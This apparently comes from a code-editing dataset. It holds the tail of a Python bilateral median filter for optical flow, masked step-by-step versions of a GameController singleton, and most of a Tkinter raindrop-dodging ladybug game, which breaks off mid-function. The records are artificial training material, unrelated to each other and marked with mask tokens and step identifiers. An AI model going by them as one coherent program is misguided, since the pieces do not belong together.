occlusen_compared -\n occlusen_current)\n weigths_list[counter] = weigth\n helper_flow_x_list[counter] = flow[1][y_compare][x_compare]\n helper_flow_y_list[counter] = flow[0][y_compare][x_compare]\n counter += 1\n n = counter\n f_x = auxiliary_field[1][y][x]\n f_y = auxiliary_field[0][y][x]\n scalar = 1 / (2 * (weigth_auxiliary / weigth_filter))\n for idx_1 in range(n + 1):\n sum = 0\n for idx_2 in range(idx_1):\n sum -= weigths_list[idx_2]\n for idx_2 in range(idx_1, n):\n sum += weigths_list[idx_2]\n helper_flow_x_list[n + idx_1] = f_x + scalar * sum\n helper_flow_y_list[n + idx_1] = f_y + scalar * sum\n result_flow[0][y][x] = median(helper_flow_y_list[:n * 2 + 1])\n result_flow[1][y][x] = median(helper_flow_x_list[:n * 2 + 1])\n print('result_flow')\n print(result_flow.flatten())\n return result_flow\n",
"step-4": "import math\nimport numpy as np\nfrom statistics import median\nfrom src.filter.median import quickselect_median\n\n\ndef bilateral_median_filter(flow, log_occlusen, auxiliary_field, image, weigth_auxiliary, weigth_filter,\n sigma_distance = 7, sigma_color =7 / 200, filter_size=5):\n \"\"\"\n\n :param flow: np.float (YX,Height,Width)\n :param occlusen: (Height, Width)\n :param auxiliary_field: np.array(float) (Y_flow X_flow , Y_coord X_coord, Height, Width)\n :param image: np.array(float) (ColorChannel, Height, Width)\n :param weigth_auxiliary: float > 0\n :param weigth_filter: float > 0\n :param sigma_distance: float\n :param sigma_color: float\n :param filter_size: int\n :return: flow field\n \"\"\"\n width = flow.shape[2]\n height = flow.shape[1]\n color_channel_count = flow.shape[0]\n\n filter_half = int(filter_size / 2)\n\n helper_list_size = filter_size ** 2 * 2\n helper_flow_x_list = [0.0] * (helper_list_size+1)\n helper_flow_y_list = [0.0] * (helper_list_size+1)\n weigths_list = [0.0] * helper_list_size\n\n result_flow = np.empty(shape=(2, height, width), dtype=float)\n\n for y in range(height):\n for x in range(width):\n min_x_compare = max(0, x - filter_half)\n max_x_compare = min(width, x + filter_half + 1)\n\n min_y_compare = max(0, y - filter_half)\n max_y_compare = min(height, y + filter_half + 1)\n\n counter = 0\n\n for y_compare in range(min_y_compare, max_y_compare):\n for x_compare in range(min_x_compare, max_x_compare):\n distance_squared_difference = (y - y_compare) ** 2 + (x - x_compare) ** 2\n color_squared_difference = 0\n for channel in image:\n color_squared_difference += (channel[y_compare][x_compare] - channel[y][x]) ** 2\n\n exponent = distance_squared_difference / (2 * sigma_distance * sigma_distance)\n exponent += color_squared_difference / (2 * sigma_color * sigma_color * color_channel_count)\n\n occlusen_current = log_occlusen[y][x]\n occlusen_compared = log_occlusen[y_compare][x_compare]\n\n #weigth = math.exp(-exponent) 
* occlusen_compared / occlusen_current\n weigth = math.exp(-exponent+occlusen_compared-occlusen_current)\n weigths_list[counter] = weigth\n\n helper_flow_x_list[counter] = flow[1][y_compare][x_compare]\n helper_flow_y_list[counter] = flow[0][y_compare][x_compare]\n\n counter += 1\n\n # See A NEW MEDIAN FORMULA WITH APPLICATIONS TO PDE BASED DENOISING\n # 3.13\n\n n = counter\n\n f_x = auxiliary_field[1][y][x]\n f_y = auxiliary_field[0][y][x]\n scalar = 1/(2*(weigth_auxiliary / weigth_filter))\n\n for idx_1 in range(n+1):\n sum = 0\n for idx_2 in range(idx_1):\n sum -= weigths_list[idx_2]\n\n for idx_2 in range(idx_1, n):\n sum += weigths_list[idx_2]\n helper_flow_x_list[n + idx_1] = f_x + scalar * sum\n helper_flow_y_list[n + idx_1] = f_y + scalar * sum\n\n result_flow[0][y][x] = median(helper_flow_y_list[:n*2+1])\n result_flow[1][y][x] = median(helper_flow_x_list[:n*2+1])\n print(\"result_flow\")\n print(result_flow.flatten())\n return result_flow\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class GameController:
<|reserved_special_token_0|>
@staticmethod
def get_instance():
if GameController.instance is None:
GameController()
return GameController.instance
<|reserved_special_token_0|>
def start_game(self):
View.start_game_view()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class GameController:
<|reserved_special_token_0|>
@staticmethod
def get_instance():
if GameController.instance is None:
GameController()
return GameController.instance
def __init__(self):
if GameController.instance is not None:
raise Exception('this is a singleton!')
else:
GameController.instance = self
def start_game(self):
View.start_game_view()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class GameController:
instance = None
@staticmethod
def get_instance():
if GameController.instance is None:
GameController()
return GameController.instance
def __init__(self):
if GameController.instance is not None:
raise Exception('this is a singleton!')
else:
GameController.instance = self
def start_game(self):
View.start_game_view()
<|reserved_special_token_1|>
from app.View.view import View
class GameController:
instance = None
@staticmethod
def get_instance():
if GameController.instance is None:
GameController()
return GameController.instance
def __init__(self):
if GameController.instance is not None:
raise Exception('this is a singleton!')
else:
GameController.instance = self
def start_game(self):
View.start_game_view()
|
flexible
|
{
"blob_id": "d9b405d5159a153fb8d2f1991ceb3dc47f98bcbc",
"index": 9192,
"step-1": "<mask token>\n\n\nclass GameController:\n <mask token>\n\n @staticmethod\n def get_instance():\n if GameController.instance is None:\n GameController()\n return GameController.instance\n <mask token>\n\n def start_game(self):\n View.start_game_view()\n",
"step-2": "<mask token>\n\n\nclass GameController:\n <mask token>\n\n @staticmethod\n def get_instance():\n if GameController.instance is None:\n GameController()\n return GameController.instance\n\n def __init__(self):\n if GameController.instance is not None:\n raise Exception('this is a singleton!')\n else:\n GameController.instance = self\n\n def start_game(self):\n View.start_game_view()\n",
"step-3": "<mask token>\n\n\nclass GameController:\n instance = None\n\n @staticmethod\n def get_instance():\n if GameController.instance is None:\n GameController()\n return GameController.instance\n\n def __init__(self):\n if GameController.instance is not None:\n raise Exception('this is a singleton!')\n else:\n GameController.instance = self\n\n def start_game(self):\n View.start_game_view()\n",
"step-4": "from app.View.view import View\n\n\nclass GameController:\n instance = None\n\n @staticmethod\n def get_instance():\n if GameController.instance is None:\n GameController()\n return GameController.instance\n\n def __init__(self):\n if GameController.instance is not None:\n raise Exception('this is a singleton!')\n else:\n GameController.instance = self\n\n def start_game(self):\n View.start_game_view()\n",
"step-5": null,
"step-ids": [
3,
4,
5,
6
]
}
|
[
3,
4,
5,
6
] |
#Arushi Patel (aruship)
from tkinter import *
import random
######################################
#images taken from wikipedia,pixabay,
#trans americas, clipartpanda,pngimg,
#findicons, microsoft word
######################################
####################################
# init
####################################
def init(data):
    """Reset all top-level game state, then run the chained init helpers."""
    data.score, data.mode, data.timerDelay = 0, "splashScreen", 100
    data.height, data.width = 800, 800
    data.speed, data.speedAI, data.speedAI2 = 10, 12, 12
    data.switchOnProgress = False
    data.r = 25                       # collision radius used everywhere
    data.cx, data.cy = 280, 750       # single-player bug position
    data.onLeft1, data.onLeft2 = True, True
    data.win = False
    # one falling-object list per mode / player
    data.coconuts, data.powerUps = [], []
    data.coconuts1, data.coconuts2 = [], []
    data.coconutsAI1, data.coconutsAI2 = [], []
    data.invincible = []
    data.pauseDrops, data.pause1Drop, data.pause2Drop = False, False, False
    init1(data)
def init1(data):
    """Init stage 2: power-up flags, timers, and the gif art assets."""
    data.beInvincible = data.Invincible1 = data.Invincible2 = False
    data.scaryBug = []
    data.time = 0
    data.coconutFall = False
    data.sides = ["r", "l"]
    data.level = 1
    data.splashScreenTime = 0
    data.splashScreenDrops = []
    # gif assets (loading requires an active Tk root window)
    art = [("background", "tree.gif"), ("deadScreen", "deadBug.gif"),
           ("ladyBug", "lady.gif"), ("winScreen", "treeTop1.gif"),
           ("winBug", "littleBug.gif"), ("halfBackground", "halfTree.gif"),
           ("umbrella", "umbrella2.gif"), ("spider", "spider.gif"),
           ("hourGlass", "hourGlass.gif"), ("splashScreen", "splash.gif")]
    for attribute, fileName in art:
        setattr(data, attribute, PhotoImage(file=fileName))
    init2(data)
def init2(data):
    """Init stage 3: two-player positions and the level-editor widget state."""
    for attribute, fileName in [("tbg", "tbg2.gif"), ("click", "click.gif"),
                                ("notClick", "notClick.gif")]:
        setattr(data, attribute, PhotoImage(file=fileName))
    data.player1X, data.player1Y = 150, 750
    data.player2X, data.player2Y = 550, 750
    data.winner = None
    data.speed = data.speed2 = 12
    data.editorTime = 0
    data.editorDrops = []
    data.margin = 100
    data.enter = False
    # editor selections start unset; every option button starts un-clicked
    data.powerUpsEditor = data.yourSpeed = data.rainSpeed = None
    data.slow = data.medium = data.fast = data.notClick
    data.drizzle = data.rain = data.thunderstorm = data.notClick
    init3(data)
def init3(data):
    """Init stage 4: menu button states, remaining assets, saved scores."""
    data.yes = data.no = data.enter = data.notClick
    data.levelEditorLives = 2
    data.rSpeed = None
    data.start = data.start1 = data.start2 = None
    data.difficulty = None
    # the six splash-menu buttons all start in the un-clicked state
    data.mode1 = data.mode2 = data.mode3 = data.notClick
    data.mode4 = data.mode5 = data.mode6 = data.notClick
    data.home = PhotoImage(file="home.gif")
    data.helpScreen = PhotoImage(file="help1.gif")
    data.title = PhotoImage(file="title.gif")
    data.scoreList = []
    data.spotList = [270, 364, 458, 552, 646, 740]   # lane center columns
    data.savedScores = readFile("score.txt")
    if data.mode == "levelCreated":
        setEverything(data)
    initsplashScreenNumbers(data)
def initsplashScreenNumbers(data):
    """Init stage 5: layout constants for the splash menu and gameplay."""
    data.splashButtonY = 425              # x-center of the button column
    data.p1ButtonX, data.p2ButtonX = 225, 290
    data.edButton, data.diffButton = 355, 425
    data.helpButton, data.sboardButton = 490, 555
    data.hitPenalty = 75                  # pixels lost per raindrop hit
    data.splashText = data.height / 2 - 20
    data.lives = 2
    data.levelMax = 8
    data.lane = 94                        # pixel width of one tree lane
    data.Player1Min, data.Player1Max = 270, 740
    data.homeX, data.homeY = 50, 650
    initScoreBoardHelp(data)
    init1Player(data)
def initScoreBoardHelp(data):
    """Init stage 6: scoreboard/help layout plus the name-entry state."""
    data.tbgY = 5 * data.height / 12
    data.txtTScore, data.S_P = 150, 220
    data.numScores = 5
    data.scorePos = data.height / 10
    data.scoreShift = 270
    data.helpY = data.height / 2 - 20
    data.name = data.printName = ""
    data.hit = False      # becomes True once the bug dies
    initAI(data)
def init1Player(data):
    # horizontal margin kept between random drop spawns and the lane columns
    data.buffer = 40
def initAI(data):
    """Init stage 7: layout and difficulty constants for the AI/editor screens."""
    data.AITY = 225
    data.easyX, data.easyY = 200, 300
    data.medX, data.hardX = 400, 600
    data.enterY = 450
    # AI speeds for easy / medium / hard
    data.difS, data.difM, data.difH = 4, 6, 8
    data.last = 500
    data.enterX = 575
    # y-coordinates of the editor row headings (power-up, rain, your speed)
    data.PUT, data.RST, data.YST = 450, 350, 250
####################################
# mode dispatcher
####################################
def mousePressed(event, data):
    """Dispatch a mouse click to the active mode's handler."""
    handlers = {"splashScreen": splashScreenMousePressed,
                "1Player": playerMousePressed,
                "2Player": twoPlayerMousePressed,
                "editor": editorMousePressed,
                "levelCreated": levelCreatedMousePressed,
                "AI": AIMousePressed,
                "difficulty": difficultyMousePressed,
                "scoreboard": scoreboardMousePressed,
                "help": helpMousePressed}
    handler = handlers.get(data.mode)
    if handler is not None:
        handler(event, data)
def keyPressed(event, data):
    """Dispatch a key press to the active mode's handler."""
    handlers = {"splashScreen": splashKeyPressed,
                "1Player": playerKeyPressed,
                "2Player": twoPlayerKeyPressed,
                "editor": editorKeyPressed,
                "levelCreated": levelCreatedKeyPressed,
                "AI": AIKeyPressed,
                "difficulty": difficultyKeyPressed,
                "scoreboard": scoreboardKeyPressed,
                "help": helpKeyPressed}
    handler = handlers.get(data.mode)
    if handler is not None:
        handler(event, data)
def timerFired(data):
    """Dispatch a timer tick to the active mode's handler."""
    handlers = {"splashScreen": splashScreenTimerFired,
                "1Player": playerTimerFired,
                "2Player": twoPlayerTimerFired,
                "editor": editorTimerFired,
                "levelCreated": levelCreatedTimerFired,
                "AI": AITimerFired,
                "difficulty": difficultyTimerFired,
                "scoreboard": scoreboardTimerFired,
                "help": helpTimerFired}
    handler = handlers.get(data.mode)
    if handler is not None:
        handler(data)
def redrawAll(canvas, data):
    """Dispatch a redraw to the active mode's renderer."""
    handlers = {"splashScreen": splashScreenRedrawAll,
                "1Player": playerRedrawAll,
                "2Player": twoPlayerRedrawAll,
                "editor": editorRedrawAll,
                "levelCreated": levelCreatedRedrawAll,
                "AI": AIRedrawAll,
                "difficulty": difficultyRedrawAll,
                "scoreboard": scoreboardRedrawAll,
                "help": helpRedrawAll}
    handler = handlers.get(data.mode)
    if handler is not None:
        handler(canvas, data)
####################################
# splashScreen mode
####################################
def splashScreenMousePressed(event, data):
    """Switch to the mode whose splash-menu button contains the click."""
    inside_column = (data.splashButtonY - 2 * data.r <= event.x
                     <= data.splashButtonY + 2 * data.r)
    if not inside_column:
        return
    buttons = [(data.p1ButtonX, "1Player"),
               (data.p2ButtonX, "2Player"),
               (data.edButton, "editor"),
               (data.diffButton, "difficulty"),
               (data.helpButton, "help"),
               (data.sboardButton, "scoreboard")]
    for center_y, mode in buttons:
        if center_y - data.r <= event.y <= center_y + data.r:
            data.mode = mode
def splashKeyPressed(event, data):
    # the splash screen is mouse-driven; key presses are ignored
    pass
def splashScreenTimerFired(data):
    """Advance the splash-screen rain animation by one tick."""
    data.splashScreenTime += 1
    odd_tick = data.splashScreenTime % 2 == 1
    if odd_tick:
        # spawn a new background drop every other tick
        rainDropSplash(data)
    for raindrop in data.splashScreenDrops:
        raindrop.onTimerFired(data)
def splashScreenButtons(canvas, data):
    """Draw the six menu buttons down the splash screen's button column."""
    centers_and_images = [(data.p1ButtonX, data.mode1),
                          (data.p2ButtonX, data.mode2),
                          (data.edButton, data.mode3),
                          (data.diffButton, data.mode4),
                          (data.helpButton, data.mode5),
                          (data.sboardButton, data.mode6)]
    for center_y, image in centers_and_images:
        canvas.create_image(data.splashButtonY, center_y, image=image)
def rainDropSplash(data):
    """Spawn one splash-screen raindrop at a random column along the top."""
    data.splashScreenDrops.append(Coconuts(random.randint(0, 800), 0))
def splashScreenRedrawAll(canvas, data):
    """Draw the splash screen: title art, animated rain, menu text, buttons."""
    canvas.create_image(data.width/2, data.splashText-10, image=data.title)
    # animated background rain
    for drop in data.splashScreenDrops: drop.draw(canvas)
    canvas.create_text(data.width/2, data.splashText, text="""
    1.) Single Player Level Mode
    2.) Two-Player Mode
    3.) Level Creator Practice Mode
    4.) Play Against the Computer
    5.) Help and Instructions
    6.) Scoreboard
    """, font="Arial 14 bold", fill = "yellow")
    splashScreenButtons(canvas, data)
####################################
# taken from class notes
####################################
def writeFile(path, contents):
    """Overwrite *path* with *contents* (text mode)."""
    with open(path, "wt") as fileHandle:
        fileHandle.write(contents)
def readFile(path):
    """Return the entire text contents of *path*."""
    with open(path, "rt") as fileHandle:
        return fileHandle.read()
####################################
# 1Player mode
####################################
#Coconuts (from Mario game) represent the water drops
class Coconuts(object):
    """A falling raindrop (diamond shape): the game's basic hazard."""

    def __init__(self, x, y):
        self.x, self.y = x, y
        self.r = 9
        self.fill = "deep sky blue"
        self.speed = 30
        self.outline = "blue"

    def draw(self, canvas):
        # diamond: tall top point, side points, short bottom point
        top = (self.x, self.y - 2 * self.r)
        left = (self.x - self.r, self.y)
        bottom = (self.x, self.y + self.r)
        right = (self.x + self.r, self.y)
        canvas.create_polygon(*top, *left, *bottom, *right,
                              fill=self.fill, outline=self.outline, width=3)

    def onTimerFired(self, data):
        # gravity: fall straight down one step per tick
        self.y += self.speed
def hit(data):
    """Collide falling drops with the single player's bug.

    A hit knocks the bug down by ``hitPenalty`` pixels, costs score
    (1Player) or lives (levelCreated), and consumes the drop.  Only
    meaningful in the single-player modes; a no-op otherwise.
    """
    if data.mode != "1Player" and data.mode != "levelCreated":
        return
    # BUGFIX: iterate over a snapshot -- the original removed items from the
    # list it was iterating, which silently skipped the element after each hit
    for coconut in list(data.coconuts):
        if (data.cy - data.r <= coconut.y <= data.cy + data.r and
                data.cx - data.r <= coconut.x <= data.cx + data.r):
            data.cy += data.hitPenalty        # knock the bug back down
            if data.mode == "levelCreated":
                data.lives -= 1
                data.levelEditorLives -= 1
            elif data.hit == False and data.level < data.levelMax:
                data.score -= data.level      # higher levels cost more
            data.coconuts.remove(coconut)
def hit2Player(data):
    """Collide drops with each player's bug in 2-player mode.

    Skipped entirely outside 2-player mode; each player is skipped while
    their umbrella invincibility is active.  Iterates over snapshots
    because hits remove drops from the lists (the original mutated the
    lists while iterating them, skipping elements).
    """
    if data.mode != "2Player":
        return
    if data.Invincible1 == False:
        for coconut in list(data.coconuts1):
            if (data.player1Y - data.r <= coconut.y <= data.player1Y + data.r and
                    data.player1X - data.r <= coconut.x <= data.player1X + data.r):
                data.player1Y += data.hitPenalty
                data.coconuts1.remove(coconut)
    if data.Invincible2 == False:
        for coconut in list(data.coconuts2):
            if (data.player2Y - data.r <= coconut.y <= data.player2Y + data.r and
                    data.player2X - data.r <= coconut.x <= data.player2X + data.r):
                data.player2Y += data.hitPenalty
                data.coconuts2.remove(coconut)
class PowerUps(Coconuts):
    """Hour-glass pickup that pauses the rain; shares Coconuts' fall physics."""

    def __init__(self, x, y):
        Coconuts.__init__(self, x, y)

    def draw(self, canvas, data):
        # drawn from the shared hour-glass gif instead of the diamond polygon
        canvas.create_image(self.x, self.y, image=data.hourGlass)
def hitPause(data):
    """Detect pickup of an hour-glass power-up.

    Sets the matching pause flag and records the collector's y position
    so the effect can be expired after 120 px of climbing.  Iterates over
    a snapshot because hits remove items from ``data.powerUps`` (the
    original mutated the list while iterating it, skipping elements).
    """
    for powerUp in list(data.powerUps):
        if data.mode == "1Player" or data.mode == "levelCreated":
            if (data.cy - data.r <= powerUp.y <= data.cy + data.r and
                    data.cx - data.r <= powerUp.x <= data.cx + data.r):
                data.pauseDrops = True
                data.start = data.cy
                data.powerUps.remove(powerUp)
        elif data.mode == "2Player" or data.mode == "AI":
            # player 1's half
            if (data.player1Y - data.r <= powerUp.y <= data.player1Y + data.r and
                    data.player1X - data.r <= powerUp.x <= data.player1X + data.r):
                data.pause1Drop = True
                data.start1 = data.player1Y
                data.powerUps.remove(powerUp)
            # player 2's half
            if (data.player2Y - data.r <= powerUp.y <= data.player2Y + data.r and
                    data.player2X - data.r <= powerUp.x <= data.player2X + data.r):
                data.pause2Drop = True
                data.start2 = data.player2Y
                data.powerUps.remove(powerUp)
class Invincible(PowerUps):
    """Umbrella pickup granting temporary invincibility; falls like a drop."""

    def __init__(self, x, y):
        PowerUps.__init__(self, x, y)

    def draw(self, canvas, data):
        # umbrella sprite instead of the hour-glass
        canvas.create_image(self.x, self.y, image=data.umbrella)
def hitInvincible(data):
    """Detect pickup of an umbrella power-up (temporary invincibility).

    Records the collector's y position so the effect can be expired after
    120 px of climbing.  Iterates over a snapshot because hits remove
    items from ``data.invincible`` (the original mutated the list while
    iterating it, skipping elements).
    """
    for powerUp in list(data.invincible):
        if data.mode == "1Player" or data.mode == "levelCreated":
            if (data.cy - data.r <= powerUp.y <= data.cy + data.r and
                    data.cx - data.r <= powerUp.x <= data.cx + data.r):
                data.beInvincible = True
                data.start = data.cy
                data.invincible.remove(powerUp)
        if data.mode == "2Player" or data.mode == "AI":
            # player 1's bug
            if (data.player1Y - data.r <= powerUp.y <= data.player1Y + data.r and
                    data.player1X - data.r <= powerUp.x <= data.player1X + data.r):
                data.Invincible1 = True
                data.start1 = data.player1Y
                data.invincible.remove(powerUp)
            # player 2's bug
            if (data.player2Y - data.r <= powerUp.y <= data.player2Y + data.r and
                    data.player2X - data.r <= powerUp.x <= data.player2X + data.r):
                data.Invincible2 = True
                data.start2 = data.player2Y
                data.invincible.remove(powerUp)
class ScaryBug(object):
    """A spider hazard: contact is instant death (or an instant win for
    the opponent in the two-player modes).

    In 2Player/AI modes it climbs upward; in the single-player modes it
    shuffles sideways between lanes every 8th tick.
    """

    def __init__(self, x, y):
        self.x = x
        self.y = y
        self.speed = 25

    def draw(self, canvas, data):
        canvas.create_image(self.x, self.y, image=data.spider)

    def onTimerFired(self, data):
        if data.mode == "2Player" or data.mode == "AI":
            self.speed = 35
            self.y -= self.speed
        # BUGFIX: the original condition was
        #   data.mode == "1Player" or data.mode == "levelCreated" and data.time % 8 == 0
        # which, because `and` binds tighter than `or`, made the spider jump
        # lanes EVERY tick in 1Player mode instead of every 8th tick (the
        # time % 8 gate and the comment below show the intended behavior).
        if (data.mode == "1Player" or data.mode == "levelCreated") and \
                data.time % 8 == 0:
            # makes spider dynamically move between lanes, bouncing off edges
            side = random.choice(data.sides)
            if side == "l":
                if self.x - data.lane >= data.Player1Min:
                    self.x -= data.lane
                else:
                    self.x += data.lane
            elif side == "r":
                if self.x + data.lane <= data.Player1Max:
                    self.x += data.lane
                else:
                    self.x -= data.lane
def hitScaryBug(data):
    """Check spider contact: zeroes all lives in single-player modes, or
    hands the win to the opposing player in the two-player modes."""
    for spider in data.scaryBug:
        if data.mode in ("1Player", "levelCreated"):
            # the spider has a 1.5x collision radius
            near_y = data.cy - 1.5 * data.r <= spider.y <= data.cy + 1.5 * data.r
            near_x = data.cx - 1.5 * data.r <= spider.x <= data.cx + 1.5 * data.r
            if near_y and near_x:
                data.hit = True
                data.lives = 0
                data.levelEditorLives = 0
        if data.mode in ("2Player", "AI"):
            if (data.player1Y - data.r <= spider.y <= data.player1Y + data.r and
                    data.player1X - data.r <= spider.x <= data.player1X + data.r):
                data.winner = "player2"
            if (data.player2Y - data.r <= spider.y <= data.player2Y + data.r and
                    data.player2X - data.r <= spider.x <= data.player2X + data.r):
                data.winner = "player1"
def drawPowerups(canvas, data):
    """Render every active spider, hour-glass, and umbrella sprite."""
    # same draw order as before: spiders, then hour-glasses, then umbrellas
    for sprite in data.scaryBug + data.powerUps + data.invincible:
        sprite.draw(canvas, data)
def drawHome(canvas, data):
    """Draw the home button (shown on every screen)."""
    home_x, home_y = data.homeX, data.homeY
    canvas.create_image(home_x, home_y, image=data.home)
def checkHome(event, data):
    """Reset to the splash screen when the home button is clicked."""
    inside_x = data.homeX - data.r <= event.x <= data.homeX + data.r
    inside_y = data.homeY - data.r <= event.y <= data.homeY + data.r
    if inside_x and inside_y:
        init(data)
def coconutShot(data):
    """Spawn this tick's raindrops for single-player mode.

    The spawn rate scales with the current level; a drop occasionally
    falls straight down a lane edge.  Power-ups are handled separately.
    """
    if data.level > 0 and data.pauseDrops == False:
        if data.time % int(data.levelMax / data.level) == 0 or data.time % 6 == 0:
            # drops grow denser as the level climbs
            left_x = random.randint(0, data.Player1Min - data.buffer)
            right_x = random.randint(data.Player1Max + data.buffer,
                                     data.width + data.buffer)
            data.coconuts.append(Coconuts(left_x, 0))
            data.coconuts.append(Coconuts(right_x, 0))
            middle_x = random.randint(data.Player1Min - data.buffer,
                                      data.Player1Max + data.buffer)
            data.coconuts.append(Coconuts(middle_x, 0))
        if data.time % 5 == 0:
            extra_x = random.randint(0, data.Player1Min - data.buffer)
            data.coconuts.append(Coconuts(extra_x, 0))
        if data.time % int(24 / data.level) == 0:
            # occasionally rain directly down one lane edge
            side = random.choice(data.sides)
            if side == "l":
                data.coconuts.append(Coconuts(data.Player1Min, 0))
            elif side == "r":
                data.coconuts.append(Coconuts(data.Player1Max, 0))
    powerUpCoconutShot(data)
def powerUpCoconutShot(data):
    """Drop pickups and spiders for single-player mode.

    The three timers are staggered so the pickup types rarely coincide.
    """
    if data.time % 60 == 0 and data.time % 120 != 0:
        data.powerUps.append(PowerUps(random.choice(data.spotList), 0))
    if data.time % 50 == 0:
        data.invincible.append(Invincible(random.choice(data.spotList), 0))
    if data.time % 100 == 0:
        # spiders start at the bottom of the tree and sit in a lane
        data.scaryBug.append(ScaryBug(random.choice(data.spotList), 750))
def playerKeyPressed(event, data):
    """Single-player keys: 'r' restarts, arrows move, and after winning
    the keyboard types a scoreboard name."""
    half_lane = data.lane / 2
    if data.level < data.levelMax and event.keysym == "r":
        init(data)
    if event.keysym == "Left" and data.cx >= data.Player1Min + half_lane:
        data.cx -= half_lane
    elif event.keysym == "Right" and data.cx <= data.Player1Max:
        data.cx += half_lane
    if data.level >= data.levelMax:
        # game won: the player is typing a name for the scoreboard
        if len(event.keysym) == 1 and len(data.name) < 15:
            data.name += event.keysym
        if event.keysym == "BackSpace":
            data.name = data.name[:-1]
        if event.keysym == "Return":
            data.scoreList += (data.score, data.name)
            # persist the score file before jumping to the scoreboard
            writeFile("score.txt",
                      data.savedScores + str(data.score) + "," + data.name + "\n")
            data.mode = "scoreboard"
def playerMousePressed(event, data):
    # the only clickable element during play is the home button
    checkHome(event, data)
def playerTimerFired(data):
    """One tick of single-player mode: climb, spawn, advance, collide."""
    alive = data.hit == False and data.level < data.levelMax
    if alive:
        data.cy -= data.speed                 # the bug climbs every tick
        if data.time % 5 == 0:
            data.score += data.level
        if data.cy < 15:                      # reached the treetop
            data.level += 1
            data.cy = data.Player1Max + 10
            data.speed += 2
    if data.cy > 40:                          # no spawning near the very top
        data.time += 1
        if data.pauseDrops != True:
            coconutShot(data)
    for hourGlassDrop in data.powerUps:
        hourGlassDrop.onTimerFired(data)
    hitPause(data)
    for umbrellaDrop in data.invincible:
        umbrellaDrop.onTimerFired(data)
    hitInvincible(data)
    for spider in data.scaryBug:
        spider.onTimerFired(data)
    hitScaryBug(data)
    for raindrop in data.coconuts:
        if data.pauseDrops == False:          # frozen rain doesn't move
            raindrop.onTimerFired(data)
        if data.beInvincible == False:
            hit(data)
    if data.start != None and abs(data.start - data.cy) >= 120:
        # power-up effects last until the bug has climbed 120 px
        data.pauseDrops, data.beInvincible = False, False
def playerRedrawAll(canvas, data):
    """Render single-player mode; overlays the lose or win screen when done."""
    # magic #s mainly for screen placement
    canvas.create_image(data.width/2, data.height/2, image=data.background)
    canvas.create_line(0,20, data.width, 20)
    for coconut in data.coconuts: coconut.draw(canvas)
    drawPowerups(canvas, data)
    canvas.create_image(data.cx, data.cy, image=data.ladyBug)
    canvas.create_text(data.width/6,50, text ="Level: %d" %data.level,
                       font = "Arial 18 bold", fill = "yellow")
    canvas.create_text(data.width/6,80, text ="Score: %d" %data.score,
                        font = "Arial 18 bold", fill = "yellow")
    canvas.create_text(2*data.width/3,660,
            text ="""The greater the level, the more points get
             added to your score!""",
            font = "Arial 15 bold", fill = "yellow")
    # death overlay (spider contact sets data.hit)
    if data.hit== True:
        canvas.create_rectangle(0,0,data.width, data.height, fill = "black")
        canvas.create_image(data.width/2, data.height/2, image=data.deadScreen)
        canvas.create_text(data.width/2,data.height/4,
                text = "You Lose! Better Luck Next Time!",
                font = "Helvetica 23 bold", fill = "yellow")
        canvas.create_text(data.width/2,280, text ="Score: %d" %data.score,
                        font = "Arial 13 bold", fill = "yellow")
    # win overlay once the final level has been passed
    if data.level >= 8: madeIt(canvas, data)
    drawHome(canvas, data)
def madeIt(canvas, data):# magic #s mainly for screen placement
    """Draw the victory screen with the score and the name-entry box."""
    canvas.create_rectangle(0,0, data.width, data.height, fill = "black")
    canvas.create_image(data.width/2, data.height/2, image=data.winScreen)
    canvas.create_image(300, 320, image=data.winBug)
    canvas.create_text(data.width/2,70, text = "You Made it!",
                        font = "Arial 23 bold", fill = "yellow")
    canvas.create_text(data.width/2,100, text ="Score: %d" %data.score,
                        font = "Arial 15 bold", fill = "yellow")
    canvas.create_text(data.width/2,375, text ="Congrats! Enter your Name!",
                        font = "Arial 15 bold", fill = "yellow")
    # white box showing the name typed so far (playerKeyPressed edits data.name)
    canvas.create_rectangle(data.width/2 - 50, 400, data.width/2+50, 450,
                        fill = "white")
    canvas.create_text(data.width/2, 425, text = data.name)
####################################
# 2Player mode
####################################
def drop2Player(data):
    """Spawn mirrored raindrops on both halves of the 2-player screen."""
    if data.winner is None and data.pauseDrops == False:
        if data.time % 15 == 0:
            column = random.randint(0, 385)
            # keep random drops clear of the two lane columns
            if abs(column - 100) > 25 and abs(column - 360) > 25:
                if data.pause1Drop != True:
                    data.coconuts1.append(Coconuts(column, 0))
                if data.pause2Drop != True:
                    data.coconuts2.append(Coconuts(column + 410, 0))
        if data.time % 12 == 0:
            # every 12th tick a drop falls straight down one lane on each half
            lane_side = random.choice(data.sides)
            left_lane = lane_side == "l"
            player1_x = 140 if left_lane else 344
            player2_x = 540 if left_lane else 755
            if data.pause1Drop != True:
                data.coconuts1.append(Coconuts(player1_x, 0))
            if data.pause2Drop != True:
                data.coconuts2.append(Coconuts(player2_x, 0))
    powerupDrop2Player(data)
def powerupDrop2Player(data):
    """Drop pickups (mirrored on both halves) and occasional spiders."""
    def lane_pair(side):
        # x columns for (player 1's half, player 2's half)
        return (140, 540) if side == "l" else (344, 755)
    if data.time % 45 == 0 and data.time % 90 != 0:
        x1, x2 = lane_pair(random.choice(data.sides))
        if data.pause1Drop != True:
            data.powerUps.append(PowerUps(x1, 0))
        if data.pause2Drop != True:
            data.powerUps.append(PowerUps(x2, 0))
    if data.time % 60 == 0:
        x1, x2 = lane_pair(random.choice(data.sides))
        if data.pause1Drop != True:
            data.invincible.append(Invincible(x1, 0))
        if data.pause2Drop != True:
            data.invincible.append(Invincible(x2, 0))
    if data.time % 90 == 0:
        # spiders appear on both halves regardless of pause state
        x1, x2 = lane_pair(random.choice(data.sides))
        data.scaryBug.append(ScaryBug(x1, 750))
        data.scaryBug.append(ScaryBug(x2, 750))
def twoPlayerKeyPressed(event, data):
    """'a'/'d' switch player 1's lane; arrow keys switch player 2's."""
    if event.keysym == "r":
        init(data)
    if data.winner is None:
        if event.keysym == "a" and data.onLeft1 == False:
            data.onLeft1, data.player1X = True, 150
        if event.keysym == "d" and data.onLeft1 == True:
            data.onLeft1, data.player1X = False, 330
        if event.keysym == "Left" and data.onLeft2 == False:
            data.onLeft2, data.player2X = True, 550
        if event.keysym == "Right" and data.onLeft2 == True:
            data.onLeft2, data.player2X = False, 750
def twoPlayerMousePressed(event, data):
    # only the home button is clickable in 2-player mode
